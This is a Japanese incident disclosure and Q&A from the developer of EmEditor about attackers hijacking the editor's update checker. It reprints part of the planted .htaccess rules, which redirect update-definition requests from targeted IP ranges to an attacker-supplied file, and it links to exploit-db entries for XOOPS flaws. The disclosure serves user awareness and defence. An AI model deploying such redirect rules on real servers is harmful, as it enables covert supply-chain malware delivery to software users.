今回のハッカーによる攻撃の詳細について

今回のハッキングの事件に関して、お客様には大変ご迷惑をお掛けして申し訳ありませんでした。

EmEditor は、お客様のご意見を承りながら、私が何年間も掛けて大切に創り上げて参りましたプログラムです。皆様に安心して使っていただけるはずだった更新チェッカーがハッカーに悪用されたことについて、大変遺憾に思っておりますと共に、お客様には大変ご迷惑をお掛けして申し訳なく思っております。

お客様より、多くのご質問を頂いております。また、情報をもっと公開すべきというご意見も頂いております。当初は、ハッキングの内容まで詳細な情報を公開することには不安があったのですが、それよりも情報を共有することにより、お客様にさらにご理解いただき、また他のウェブ サイト管理者の皆様のご参考になればと思い、多くの情報を公開することに致しました。

皆様からのご質問と回答についてまとめました。

1. ハッカーの手法について

EmEditor の更新チェッカーは、Advanced Installer で作成された更新チェッカーを使用しています。EmEditor でのファイル名は、 eeupdate.exe です。この更新チェッカーは、既定の設定では、定期的に、 http://www.emeditor.com/pub/updates/(更新定義ファイル) をチェックしています。更新定義ファイルのファイル名は、emed32_updates.txt、emed64_updates.txt、emed32_updates_ja.txt、emed64_updates_ja.txt のいずれかになります。これらの更新定義ファイルには、インストールするインストーラーへのパス、更新内容の説明、ファイルのサイズ、更新日など、インストーラーの詳細が記述されています。(詳しくは、 http://www.advancedinstaller.com/user-guide/updates-configuration.html を参照してください)

今回の事件では、/pub/updates/ のフォルダに、ハッカーにより .htaccess ファイルが置かれていました。このファイルには、以下の内容が記述されていました。

——–
SetEnvIf Remote_Addr “106\.188\.131\.[0-9]+” install
SetEnvIf Remote_Addr “133\.6\.94\.[0-9]+” install
(… 同様に70行 …)
SetEnvIf Remote_Addr “124\.248\.207\.[0-9]+” install
RewriteEngine on
RewriteCond %{ENV:install} =1
RewriteRule (.*\.txt)$ /pub/rabe/editor.txt [L]
———

そして、ハッカーによって置かれたもう1つのファイルは、 /pub/rabe/editor.txt でした。これは、実際の更新定義ファイルに似ていました。しかし、その時は特に問題だと思わず、単純に削除してしまいました。ファイルを削除してしまったため、サーバー管理者に問い合わせて、バックアップを探したのですが、見つかりませんでした。もし、このファイルを削除せずにバックアップを取っておけば、さらに多くの情報を見つけることができたので、これについては、非常に残念で悔いが残っています。大変、申し訳ありません。

したがって、/pub/rabe/editor.txt にある更新定義ファイルの内容によっては、実際にマルウェアだったのか、無害のファイルだったのか、あるいは、ハッカーが実際のマルウェアを導入する前のテスト段階だったのか、現在のところ、断定できないでいます。

2. 自動インストールは有効にしておらず、更新チェックが有効の場合には、問題はありませんか?

実際にインストールが行われていなければ問題はありません。自動インストールは、既定では無効になっています。自動インストールが有効になっていなければ、お客様が、手動で、更新を指定しない限り、自動的にインストールが行われることはありません。更新をチェックしただけで実際の更新 (インストール) を行っていなければ、問題はありません。

3. 更新チェックの実行条件は?

更新チェックは、EmEditor を起動時で、指定されている日数間隔で行われます。(既定は、EmEditor のバージョンにより 1日～5日)。EmEditor を起動しない限り、更新チェックが実行されることはありません。

4. 感染リスクのある時間帯の判断根拠は?

私が問題のファイル (.htaccess と editor.txt) の存在に気付いて削除したのは、日本時間の 8/19 午前 3:20 頃でした。サーバー会社による最後のバックアップが取られたのが、8/18 午後 10:36 でしたが、そのバックアップにこれらのファイルが存在しなかったため、問題のファイルが置かれた時間は、最後にバックアップが取られた後ということになります。

5. 現在公表されている以前の時間帯で、更新チェックの問題が無かったことは確認済みですか?

これについては、残念ながら、確実に問題がなかったと断言はできません。しかし、毎日、サーバー上のファイルの変更は監視していて、以前には、このような問題には気付いたことがありませんでした。

6. 感染するウイルスの種類は?

問題のファイル editor.txt を削除してしまったため、本当にマルウェアがリダイレクトされていたかも判断できない状態です。したがって、感染されるウィルスの種類も特定できていません。実際にはマルウェアやウィルスではなかった可能性があります。

7. 実際にマルウェアに感染された組織は?

現在のところ、マルウェアやウィルスに感染された事例は1つの報告もありません。また、実際にマルウェアやウィルスが存在したかどうかも確認できていません。マルウェアやウィルスの感染あくまでも可能性であり、実際には、マルウェアやウィルスは存在せず、ハッカーのテスト段階でウィルス感染を未然に阻止できている可能性があることも考えられます。

8. 問題のファイルを提供できますか?

.htaccess ファイルについては手元にありますが、個々の IP アドレスが個人情報に該当しますので、お教えできるのは、上記の内容ということでご理解いただけると幸いです。もう１つのファイルである editor.txt については、削除してしまったため、バックアップにも見つからなかったため、残念ながら、手元にない状態です。これついては、本当に申し訳ありません。

9. ウイルスが置かれた原因は、XOOPSのどういう脆弱性が攻撃された可能性が高いのでしょうか？

まず最初に、ハッカーが実際に XOOPS の脆弱性を利用したかどうかについても、実際には判断できない状態ですが、可能性として書かせていただきます。

現在では削除されている、ロシア語、チェコ語、イタリア語、スペイン語、フランス語の EmEditor ウェブ サイトでは、XOOPS Cube 2.0.16a JP (2006年) が使用されていました。XOOPS には、以下のような脆弱性が報告されていますが、XOOPS にはいくつかの派生があり、必ずしもすべての事例が当てはまるとは限らないのでご留意ください。

http://www.exploit-db.com/exploits/32097

http://www.exploit-db.com/exploits/32098

http://www.exploit-db.com/exploits/5057

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=xoops&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_exploit_text=&filter_port=0&filter_osvdb=&filter_cve=

XOOPS Cube 2.0.16a JP については、XOOPS Cube の日本バージョンの最後のバージョンで、開発が停止していました。そこで、新しい XOOPS の別の派生バージョンへは、互換性の問題で更新ができないままでいました。

10. IP アドレス一覧に私の IP が含まれていなければ問題はありませんか?

IP アドレス一覧にお客様の IP アドレスが含まれていなければ、更新チェックを行ったとしても、問題はなかったと考えられます。

11. EmEditor ホーム ページにアクセスしただけでウィルスに感染するのでしょうか?

EmEditor ホーム ページにアクセスしただけでウィルスに感染するというとは考えられません。

12. 全ファイルスキャンをすると時間がかかるため、まず最初に確認した方がよいフォルダがあれば、教えていただけると助かります。

残念ながら、実際にマルウェアが存在したかどうかもわからないため、もしマルウェアに感染されたとしても、どこにマルウェアがインストールされているかもわからない状態です。大変申し訳ありません。

13. ウィルススキャンで何も発見されなければ問題ないのでしょうか？ ウィルススキャンソフトによっては検知できないということはありませんか。

残念ながら、マルウェアだったとしても、どのようなウィルスが存在したかを特定することはできません。通常に知られているウィルスであれば、Windows に付属、または市販のセキュリティ ソフトウェアで検出できると考えられます。

14. 今後の対策について

今回、問題の可能性が高い XOOPS によるサイトをすべて削除いたしましたが、ハッカーがどのような手法で悪意のあるファイルを置いたのかが分からない状態です。英語、日本語のサイトは WordPress を用いて運営されています。WordPress は、常に自動的に最新のバージョンに更新を行っており、使用しているプラグイン、テーマも毎日、常に最新版に更新を行っています。また、iThemes Security プラグインを用いて、セキュリティ レベルをできるだけ上げていますが、ハッカーの手口は非常に巧妙で、どのような対策を行っても、ハッカーを 100% 完全に防ぐことは、残念ながら難しいと言えます。そこで、WordPress を使用しないウェブサイトへの移行、サーバー ホスト会社の変更なども視野に入れて、対策を検討しています。

また、更新チェッカーを作成している Advanced Installer の作成元の会社には、状況を説明して、次の 2 つの質問を行っているところです。

(1) 更新チェッカーによりマルウェアが実際にインストールされる可能性はあるかどうか。

(2) 更新チェッカーにより、実行する更新プログラムが、デジタル署名により開発元のプログラムであることを確認してから更新する手法は可能かどうか。

デジタル署名の確認方法が可能であれば、将来のバージョンではより安心して更新できるようになるはずです。

以上です。

皆様には大変ご迷惑をお掛けして申し訳ありませんでした。

今後もよろしくお願い申し上げます。